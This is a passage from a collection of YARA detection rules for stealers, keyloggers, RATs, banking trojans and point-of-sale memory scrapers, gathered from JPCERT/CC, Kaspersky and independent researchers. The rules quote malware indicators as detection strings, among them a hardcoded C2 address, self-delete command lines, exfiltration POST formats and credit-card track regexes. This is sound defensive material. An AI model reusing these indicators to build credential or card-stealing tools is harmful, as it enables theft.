        $ag = "svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe" fullword ascii
        $ah = "!inject" fullword ascii
        $ai = "!deactivebc" fullword ascii
        $aj = "!kill_os" fullword ascii
        $ak = "!load" fullword ascii
        $al = "!new_config" fullword ascii
        $am = "!activebc" fullword ascii
        $an = "keylog.txt" fullword ascii
        $ao = "keys_path.txt" fullword ascii
        $ap = "pass.log" fullword ascii
        $aq = "passwords.txt" fullword ascii
        $ar = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" fullword ascii
        $as = "Content-Disposition: form-data; name=\"pcname\"" fullword ascii
        $at = "botid=%s&ver=" fullword ascii
        $au = "action=auth&np=&login=" fullword ascii
        $av = "&ctl00%24MainMenu%24Login1%24UserName=" fullword ascii
        $aw = "&cvv=" fullword ascii
        $ax = "&cvv2=" fullword ascii
        $ay = "&domain=" fullword ascii
        $az = "LOGIN_AUTHORIZATION_CODE=" fullword ascii
        $ba = "name=%s&port=%u" fullword ascii
        $bb = "PeekNamedPipe" fullword ascii
        $bc = "[pst]" fullword ascii
        $bd = "[ret]" fullword ascii
        $be = "[tab]" fullword ascii
$bf = "[bks]" fullword ascii $bg = "[del]" fullword ascii $bh = "[ins]" fullword ascii $bi = "&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d&cn=" fullword ascii condition: 18 of them } rule sitrof_fortis_scar { meta: author = "J from THL <j@techhelplist.com>" date = "2018/23" reference1 = "https://www.virustotal.com/#/file/59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c/community" reference2 = "ETPRO rule 2806032, ETPRO TROJAN Win32.Scar.hhrw POST" version = 2 maltype = "Stealer" filetype = "memory" strings: $a = "?get&version" $b = "?reg&ver=" $c = "?get&exe" $d = "?get&download" $e = "?get&module" $f = "&ver=" $g = "&comp=" $h = "&addinfo=" $i = "%s@%s; %s %s \"%s\" processor(s)" $j = "User-Agent: fortis" condition: 6 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule viotto_keylogger { strings: $hdr = "MZ" $s1 = "Viotto Keylogger" $s2 = "msvbvm60" $s3 = "FtpPutFileA" $s4 = "VBA6" $s5 = "SetWindowsHookExA" condition: ($hdr at 0) and all of ($s*) } rule xDedic_SysScan_unpacked : crimeware { meta: author = " Kaspersky Lab" ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf" maltype = "crimeware" type ="crimeware" filetype = "Win32 EXE" date = "2016-03-14" version = "1.0" hash = "fac495be1c71012682ebb27092060b43" hash = "e8cc69231e209db7968397e8a244d104" hash = "a53847a51561a7e76fd034043b9aa36d" hash = "e8691fa5872c528cd8e72b82e7880e98" hash = "F661b50d45400e7052a2427919e2f777" strings: $a1="/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide $a2="SysScan DEBUG Mode!!!" ascii wide $a3="This rechecking? (set 0/1 or press enter key)" ascii wide $a4="http://37.49.224.144:8189/manual_result" ascii wide $b1="Checker end work!" ascii wide $b2="Trying send result..." 
ascii wide condition: ((uint16(0) == 0x5A4D)) and (filesize < 5000000) and ((any of ($a*)) or (all of ($b*))) } import "pe" rule xdedic_packed_syscan : crimeware { meta: author = "Kaspersky Lab" company = "Kaspersky Lab" ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf" strings: $a1 = "SysScan.exe" nocase ascii wide condition: uint16(0) == 0x5A4D and any of ($a*) and filesize > 1000000 and filesize <1200000 and pe.number_of_sections == 13 and pe.version_info["FileVersion"] contains "1.3.4." } /* YARA Rule Set for MalConfScan Author: JPCERT/CC Incident Response Group Date: 2019/04/22 Reference: https://github.com/JPCERTCC/MalConfScan/ */ rule TSCookie { meta: description = "detect TSCookie in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" hash1 = "6d2f5675630d0dae65a796ac624fb90f42f35fbe5dec2ec8f4adce5ebfaabf75" strings: $v1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" wide $b1 = { 68 D4 08 00 00 } condition: all of them } rule TSC_Loader { meta: description = "detect TSCookie Loader in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" wide $b1 = { 68 78 0B 00 00 } condition: all of them } rule CobaltStrike { meta: description = "detect CobaltStrike Beacon in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html" hash1 = "154db8746a9d0244146648006cc94f120390587e02677b97f044c25870d512c3" hash2 = "f9b93c92ed50743cd004532ab379e3135197b6fb5341322975f4d7a98a0fcde7" strings: $v1 = { 73 70 72 6E 67 00 } $v2 = { 69 69 69 69 69 69 69 69 } condition: all of them } rule RedLeaves { meta: description = "detect RedLeaves in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory 
block scan" reference = "https://blogs.jpcert.or.jp/en/2017/05/volatility-plugin-for-detecting-redleaves-malware.html" hash1 = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481" strings: $v1 = "red_autumnal_leaves_dllmain.dll" $b1 = { FF FF 90 00 } condition: $v1 and $b1 at 0 } rule Himawari { meta: description = "detect Himawari(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf" hash1 = "3938436ab73dcd10c495354546265d5498013a6d17d9c4f842507be26ea8fafb" strings: $h1 = "himawariA" $h2 = "himawariB" $h3 = "HimawariDemo" condition: all of them } rule Lavender { meta: description = "detect Lavender(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d" strings: $a1 = { C7 ?? ?? 4C 41 56 45 } $a2 = { C7 ?? ?? 4E 44 45 52 } condition: all of them } rule Armadill { meta: description = "detect Armadill(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $a1 = { C7 ?? ?? 41 72 6D 61 } $a2 = { C7 ?? ?? 64 69 6C 6C } condition: all of them } rule zark20rk { meta: description = "detect zark20rk(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "d95ad7bbc15fdd112594584d92f0bff2c348f48c748c07930a2c4cc6502cd4b0" strings: $a1 = { C7 ?? ?? 7A 61 72 6B } $a2 = { C7 ?? ?? 32 30 72 6B } condition: all of them } rule Ursnif { meta: description = "detect Ursnif(a.k.a. 
Dreambot, Gozi, ISFB) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85" hash2 = "ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714" hash3 = "1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510" strings: $a1 = "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" $b1 = "client.dll" fullword $c1 = "version=%u" $c2 = "user=%08x%08x%08x%08x" $c3 = "server=%u" $c4 = "id=%u" $c5 = "crc=%u" $c6 = "guid=%08x%08x%08x%08x" $c7 = "name=%s" $c8 = "soft=%u" $d1 = "%s://%s%s" $d2 = "PRI \x2A HTTP/2.0" $e1 = { A1 ?? ?? ?? 00 35 E7 F7 8A 40 50 } $e2 = { 56 56 56 6A 06 5? FF ?? ?? ?? ?? 00 } $f1 = { 56 57 BE ?? ?? ?? ?? 8D ?? ?? A5 A5 A5 } $f2 = { 35 8F E3 B7 3F } $f3 = { 35 0A 60 2E 51 } condition: $a1 or ($b1 and 3 of ($c*)) or (5 of ($c*)) or ($b1 and all of ($d*)) or all of ($e*) or all of ($f*) } rule Emotet { meta: description = "detect Emotet in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v4a = { BB 00 C3 4C 84 } $v4b = { B8 00 C3 CC 84 } $v5a = { 69 01 6D 4E C6 41 05 39 30 00 00 } $v5b = { 6D 4E C6 41 33 D2 81 C1 39 30 00 00 } condition: ($v4a and $v4b) or $v5a or $v5b } rule SmokeLoader { meta: description = "detect SmokeLoader in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" strings: $a1 = { B8 25 30 38 58 } $b1 = { 81 3D ?? ?? ?? ?? 25 00 41 00 } $c1 = { C7 ?? ?? ?? 
25 73 25 73 } condition: $a1 and $b1 and $c1 } rule Datper { meta: description = "detect Datper in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html" strings: $a1 = { E8 03 00 00 } $b1 = "|||" $c1 = "Content-Type: application/x-www-form-urlencoded" $push7530h64 = { C7 C1 30 75 00 00 } $push7530h = { 68 30 75 00 00 } condition: $a1 and $b1 and $c1 and ($push7530h64 or $push7530h) } rule PlugX { meta: description = "detect PlugX in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = { 47 55 4c 50 00 00 00 00 } $v2a = { 68 40 25 00 00 } $v2c = { 68 58 2D 00 00 } $v2b = { 68 a0 02 00 00 } $v2d = { 68 a4 36 00 00 } $v2e = { 8D 46 10 68 } $v2f = { 68 24 0D 00 00 } $v2g = { 68 a0 02 00 00 } $v2h = { 68 e4 0a 00 00 } $enc1 = { C1 E? 03 C1 E? 07 2B ?? } $enc2 = { 32 5? ?? 81 E? ?? ?? 00 00 2A 5? ?? 89 ?? ?? 32 ?? 2A ?? 32 5? ?? 2A 5? ?? 32 } $enc3 = { B? 33 33 33 33 } $enc4 = { B? 44 44 44 44 } condition: $v1 at 0 or ($v2a and $v2b and $enc1) or ($v2c and $v2b and $enc1) or ($v2d and $v2b and $enc2) or ($v2d and $v2e and $enc2) or ($v2f and $v2g and $enc3 and $enc4) or ($v2h and $v2g and $enc3 and $enc4) } rule Ramnit { meta: description = "detect Ramnit" author = "nazywam" module = "ramnit" reference = "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/" strings: $guid = "{%08X-%04X-%04X-%04X-%08X%04X}" $md5_magic_1 = "15Bn99gT" $md5_magic_2 = "1E4hNy1O" $init_dga = { C7 ?? ?? ?? ?? ?? FF FF FF FF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? } $xor_secret = { 8A ?? ?? 32 ?? 88 ?? 4? 4? E2 ?? 
} $init_function = { FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 } $dga_rand_int = { B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 } $cookies = "cookies4.dat" $s3 = "pdatesDisableNotify" $get_domains = { a3 [4] a1 [4] 80 3? 00 75 ?? c7 05 [4] ff ff ff ff ff 35 [4] ff 35 [4] ff 35 [4] e8 } $add_tld = { 55 8B EC 83 ?? ?? 57 C7 ?? ?? 00 00 00 00 B? ?? ?? ?? ?? 8B ?? ?? 3B ?? ?? 75 ?? 8B ?? } $get_port = { 90 68 [4] 68 [4] FF 35 [4] FF 35 [4] E8 [4] 83 } condition: $init_dga and $init_function and 2 of ($guid, $md5_magic_*, $cookies, $s3) and any of ( $get_port, $add_tld, $dga_rand_int, $get_domains, $xor_secret) } rule Hawkeye { meta: description = "detect HawkEye in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $hawkstr1 = "HawkEye Keylogger" wide $hawkstr2 = "Dear HawkEye Customers!" wide $hawkstr3 = "HawkEye Logger Details:" wide condition: all of them } rule Lokibot { meta: description = "detect Lokibot in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c" strings: $des3 = { 68 03 66 00 00 } $param = "MAC=%02X%02X%02XINSTALL=%08X%08X" $string = { 2d 00 75 00 00 00 46 75 63 6b 61 76 2e 72 75 00 00} condition: all of them } rule Bebloh { meta: description = "detect Bebloh(a.k.a. 
URLZone) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $crc32f = { b8 EE 56 0b ca } $dga = "qwertyuiopasdfghjklzxcvbnm123945678" $post1 = "&vcmd=" $post2 = "?tver=" condition: all of them } rule xxmm { meta: description = "detect xxmm in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "setupParameter:" $v2 = "loaderParameter:" $v3 = "parameter:" condition: all of them } rule Azorult { meta: description = "detect Azorult in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)" $v2 = "http://ip-api.com/json" $v3 = { c6 07 1e c6 47 01 15 c6 47 02 34 } condition: all of them } rule PoisonIvy { meta: description = "detect PoisonIvy in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $a1 = { 0E 89 02 44 } $b1 = { AD D1 34 41 } $c1 = { 66 35 20 83 66 81 F3 B8 ED } condition: all of them } rule netwire { meta: description = "detect netwire in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "HostId-%Rand%" $v2 = "mozsqlite3" $v3 = "[Scroll Lock]" $v4 = "GetRawInputData" $ping = "ping 192.0.2.2" $log = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" condition: ($v1) or ($v2 and $v3 and $v4) or ($ping and $log) } rule Nanocore { meta: description = "detect Nanocore in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "NanoCore Client" $v2 = "PluginCommand" $v3 = "CommandType" condition: all of them } rule Formbook { meta: description = "detect Formbook in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: 
$sqlite3step = { 68 34 1c 7b e1 } $sqlite3text = { 68 38 2a 90 c5 } $sqlite3blob = { 68 53 d8 7f 8c } condition: all of them } rule Agenttesla_type1 { meta: description = "detect Agenttesla in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $iestr = "C:\\\\Users\\\\Admin\\\\Desktop\\\\IELibrary\\\\IELibrary\\\\obj\\\\Debug\\\\IELibrary.pdb" $atstr = "C:\\\\Users\\\\Admin\\\\Desktop\\\\ConsoleApp1\\\\ConsoleApp1\\\\obj\\\\Debug\\\\ConsoleApp1.pdb" $sqlitestr = "Not a valid SQLite 3 Database File" wide condition: all of them } rule Agenttesla_type2 { meta: description = "detect Agenttesla in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "670a00c65eb6f7c48c1e961068a1cb7fd3653bd29377161cd04bf15c9d010da2 " strings: $type2db1 = "1.85 (Hash, version 2, native byte-order)" wide $type2db2 = "Unknow database format" wide $type2db3 = "SQLite format 3" wide condition: all of them } rule Noderat { meta: description = "detect Noderat in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html" strings: $config = "/config/app.json" $key = "/config/.regeditKey.rc" $message = "uninstall error when readFileSync: " condition: all of them } rule Njrat2 { meta: description = "detect njRAT in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d" strings: $reg = "SEE_MASK_NOZONECHECKS" wide fullword $msg = "Execute ERROR" wide fullword $ping = "cmd.exe /c ping 0 -n 2 & del" wide fullword condition: all of them } rule Trickbot { meta: description = "detect TrickBot in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c" strings: $tagm1 = "<mcconf><ver>" 
wide $tagm2 = "</autorun></mcconf>" wide $tagc1 = "<moduleconfig><autostart>" wide $tagc2 = "</autoconf></moduleconfig>" wide $tagi1 = "<igroup><dinj>" wide $tagi2 = "</dinj></igroup>" wide $tags1 = "<servconf><expir>" wide $tags2 = "</plugins></servconf>" wide $tagl1 = "<slist><sinj>" wide $tagl2 = "</sinj></slist>" wide condition: all of ($tagm*) or all of ($tagc*) or all of ($tagi*) or all of ($tags*) or all of ($tagl*) } rule Remcos { meta: description = "detect Remcos in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5" strings: $remcos = "Remcos" ascii fullword $url = "Breaking-Security.Net" ascii fullword $resource = "SETTINGS" wide fullword condition: all of them } rule Quasar { meta: description = "detect Remcos in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724" strings: $quasarstr1 = "Client.exe" wide $quasarstr2 = "({0}:{1}:{2})" wide $class = { 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 73 00 00 17 69 00 6E 00 66 00 6F 00 72 00 6D 00 61 00 74 00 69 00 6F 00 6E 00 00 80 } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ // Point of Sale (POS) Malware and Tools used during POS compromises rule blackpos_v2 { meta: author = "@patrickrolsen" version = "0.1" reference = "http://blog.nuix.com/2014/09/08/blackpos-v2-new-variant-or-different-family" strings: $s1 = "Usage: -[start|stop|install|uninstall" $s2 = "\\SYSTEM32\\sc.exe config LanmanWorkstation" $s3 = "t.bat" $s4 = "mcfmisvc" condition: uint16(0) == 0x5A4D and all of ($s*) } rule dump_tool { meta: author = "@patrickrolsen" reference = "Related to pwdump6 and fgdump tools" strings: $s1 = "lsremora" $s2 = "servpw" $s3 = "failed: %d" $s4 = "fgdump" $s5 = "fgexec" $s6 = "fgexecpipe" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule osql_tool { meta: author = "@patrickrolsen" reference = "O/I SQL - SQL query tool" filetype = "EXE" version = "0.1" date = "1/30/2014" strings: $s1 = "osql\\src" $s2 = "OSQLUSER" $s3 = "OSQLPASSWORD" $s4 = "OSQLSERVER" condition: uint16(0) == 0x5A4D and (all of ($s*)) } rule misc_pos { meta: author = "@patrickrolsen" reference = "POS Malware" strings: $s1 = "KAPTOXA" $s2 = "cmd /c net start %s" $s3 = "pid:" $s4 = "%ADD%" $s5 = "COMSPEC" $s6 = "KARTOXA" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule unknown { meta: author = "@patrickrolsen" reference = "Unknown POS" strings: $s1 = "a.exe" wide $s2 = "Can anyone test" wide $s3 = "I m in computer class now" wide condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule regex_pos { meta: author = "@patrickrolsen" reference = "POS malware - Regex" strings: $n1 = "REGEXEND" nocase $n2 = "RegExpr" nocase $n3 = "regex" $s4 = "[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s5 = "[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s6 = "(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s7 = "(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s8 = 
"(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s9 = "([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})" $s10 = "((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})" $s11 = "[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*" $s12 = "\\d{15,19}=\\d{13,}" $s13 = "\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??" $s14 = "[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" condition: uint16(0) == 0x5A4D and 1 of ($n*) and 1 of ($s*) } rule regexpr_pos { meta: author = "@patrickrolsen" reference = "POS malware - RegExpr" strings: $s1 = "RegExpr" nocase $s2 = "Data.txt" $s3 = "Track1" $s4 = "Track2" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule reg_pos { meta: author = "@patrickrolsen" reference = "POS malware - RegExpr" strings: $s1 = "T1_FOUND: %s" $s2 = "id=%s&log=%s" $s3 = "\\d{15,19}=\\d{13,}" condition: uint16(0) == 0x5A4D and 2 of ($s*) } rule sets_pos { meta: author = "@patrickrolsen" reference = "POS malware - Sets" strings: $s1 = "GET /sets.txt" condition: uint16(0) == 0x5A4D and $s1 } rule monitor_tool_pos { meta: author = "@patrickrolsen" reference = "POS malware - Monitoring Tool??" 
strings: $s1 = "RCPT TO" $s2 = "MAIL FROM" $s3 = "AUTH LOGIN" $s4 = "Reply-To" $s5 = "X-Mailer" $s6 = "crypto" $s7 = "test335.txt" wide $s8 = "/c del" condition: uint16(0) == 0x5A4D and 7 of ($s*) } rule pstgdump { meta: author = "@patrickrolsen" reference = "pstgdump" strings: $s1 = "fgdump\\pstgdump" $s2 = "pstgdump" $s3 = "Outlook" condition: uint16(0) == 0x5A4D and all of ($s*) } rule keyfinder_tool { meta: author = "@patrickrolsen" reference = "Magical Jelly Bean KeyFinder" strings: $s1 = "chgxp.vbs" $s2 = "officekey.exe" $s3 = "findkey.exe" $s4 = "xpkey.exe" condition: uint16(0) == 0x5A4D and 2 of ($s*) } rule memdump_diablo { meta: author = "@patrickrolsen" reference = "Process Memory Dumper - DiabloHorn" strings: $s1 = "DiabloHorn" $s2 = "Process Memory Dumper" $s3 = "pid-%s.dmp" $s4 = "Pid %d in not acessible" // SIC $s5 = "memdump.exe" $s6 = "%s-%d.dmp" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule blazingtools { meta: author = "@patrickrolsen" reference = "Blazing Tools - http://www.blazingtools.com (Keyloggers)" strings: $s1 = "blazingtools.com" $s2 = "Keystrokes" wide $s3 = "Screenshots" wide condition: uint16(0) == 0x5A4D and all of ($s*) } rule sysocmgr { meta: author = "@patrickrolsen" reference = "System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444" strings: $s1 = "SYSOCMGR.EXE" wide $s2 = "System stand-alone Optional Component Manager" wide condition: uint16(0) == 0x5A4D and all of ($s*) } rule lacy_keylogger { meta: author = "@patrickrolsen" reference = "Appears to be a form of keylogger." 
strings: $s1 = "Lacy.exe" wide $s2 = "Bldg Chive Duel Rip Query" wide condition: uint16(0) == 0x5A4D and all of ($s*) } rule searchinject { meta: author = "@patrickrolsen" reference = "Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)" strings: $s1 = "SearchInject" $s2 = "inject base:" $s3 = "Searcher.dll" nocase condition: uint16(0) == 0x5A4D and all of ($s*) } rule heistenberg_pos { meta: author = "@patrickrolsen" reference = "POS Malware" strings: $s1 = "KARTOXA" $s2 = "dmpz.log" $s3 = "/api/process.php?xy=" $s4 = "User-Agent: PCICompliant" // PCICompliant/3.33 $s6 = "%s:*:Enabled:%s" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule pos_jack { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" version = "0.1" reference = "http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html" date = "2/22/2014" strings: $pdb1 = "\\ziedpirate.ziedpirate-PC\\" $pdb2 = "\\sop\\sop\\" condition: uint16(0) == 0x5A4D and 1 of ($pdb*) } rule pos_memory_scrapper_ { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware Memory Scraper" version = "0.3" description = "POS Memory Scraper" date = "01/30/2014" strings: $s1 = "kartoxa" nocase $s2 = "CC2 region:" $s3 = "CC memregion:" $s4 = "target pid:" $s5 = "scan all processes:" $s6 = "<pid> <PATTERN>" $s7 = "KAPTOXA" $s8 = "ATTERN" $s9 = "\\svhst%p" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule pos_malwre_dexter_stardust { meta: author = "@patrickrolsen" maltype = "Dexter Malware - StarDust Variant" version = "0.1" description = "Table 2 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf" reference = "16b596de4c0e4d2acdfdd6632c80c070, 2afaa709ef5260184cbda8b521b076e1, and e3dd1dc82ddcfaf410372ae7e6b2f658" date = "12/30/2013" strings: $s1 = "ceh_3\\.\\ceh_4\\..\\ceh_6" $s2 = "Yatoed3fe3rex23030am39497403" $s3 = "Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19" $s4 = "CommonFile.exe" 
condition: uint16(0) == 0x5A4D and all of ($s*) } rule pos_malware_project_hook { meta: author = "@patrickrolsen" maltype = "Project Hook" version = "0.1" description = "Table 1 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf" reference = "759154d20849a25315c4970fe37eac59" date = "12/30/2013" strings: $s1 = "CallImage.exe" $s2 = "BurpSwim" $s3 = "Work\\Project\\Load" $s4 = "WortHisnal" condition: uint16(0) == 0x5A4D and all of ($s*) } rule pdb_strings_Rescator { meta: author = "@patrickrolsen" maltype = "Target Attack" version = "0.3" description = "Rescator PDB strings within binaries" date = "01/30/2014" strings: $pdb1 = "\\Projects\\Rescator" nocase condition: uint16(0) == 0x5A4D and $pdb1 } rule pos_uploader { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" reference = "http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware" version = "0.1" description = "Testing the base64 encoded file in sys32" date = "01/30/2014" strings: $s1 = "cmd /c net start %s" $s2 = "ftp -s:%s" $s3 = "data_%d_%d_%d_%d_%d.txt" $s4 = "\\uploader\\" condition: uint16(0) == 0x5A4D and all of ($s*) } rule winxml_dll { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" reference = "ce0296e2d77ec3bb112e270fc260f274" version = "0.1" description = "Testing the base64 encoded file in sys32" date = "01/30/2014" strings: $s1 = "\\system32\\winxml.dll" //$s2 = "cmd /c net start %s" //$s3 = "=== pid:" //$s4 = "GOTIT" //$s5 = ".memdump" //$s6 = "POSWDS" condition: uint16(0) == 0x5A4D and (all of ($s*)) } rule pos_chewbacca { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" reference = "https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware" hashes = "21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54" version = "0.2" description = "Testing the base64 encoded file in sys32" date = "01/30/2014" strings: $s1 = "tor -f 
<torrc>" $s2 = "tor_" $s3 = "umemscan" $s4 = "CHEWBAC" condition: uint16(0) == 0x5A4D and (all of ($s*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule BernhardPOS { meta: author = "Nick Hoffman / Jeremy Humble" last_update = "2015-07-14" source = "Morphick Inc." description = "BernhardPOS Credit Card dumping tool" reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick" md5 = "e49820ef02ba5308ff84e4c8c12e7c3d" score = 70 strings: $shellcode_kernel32_with_junk_code = { 33 c0 83 ?? ?? 83 ?? ?? 64 a1 30 00 00 00 83 ?? ?? 83 ?? ?? 8b 40 0c 83 ?? ?? 83 ?? ?? 8b 40 14 83 ?? ?? 83 ?? ?? 8b 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b 00 83 ?? ?? 83 ?? ?? 8b 40 10 83 ?? ?? } $mutex_name = "OPSEC_BERNHARD" $build_path = "C:\\bernhard\\Debug\\bernhard.pdb" $string_decode_routine = { 55 8b ec 83 ec 50 53 56 57 a1 ?? ?? ?? ?? 89 45 f8 66 8b 0d ?? ?? ?? ?? 66 89 4d fc 8a 15 ?? ?? ?? ?? 88 55 fe 8d 45 f8 50 ff ?? ?? ?? ?? ?? 89 45 f0 c7 45 f4 00 00 00 00 ?? ?? 8b 45 f4 83 c0 01 89 45 f4 8b 45 08 50 ff ?? ?? ?? ?? ?? 39 45 f4 ?? ?? 8b 45 08 03 45 f4 0f be 08 8b 45 f4 99 f7 7d f0 0f be 54 15 f8 33 ca 8b 45 08 03 45 f4 88 08 ?? ?? 5f 5e 5b 8b e5 5d } 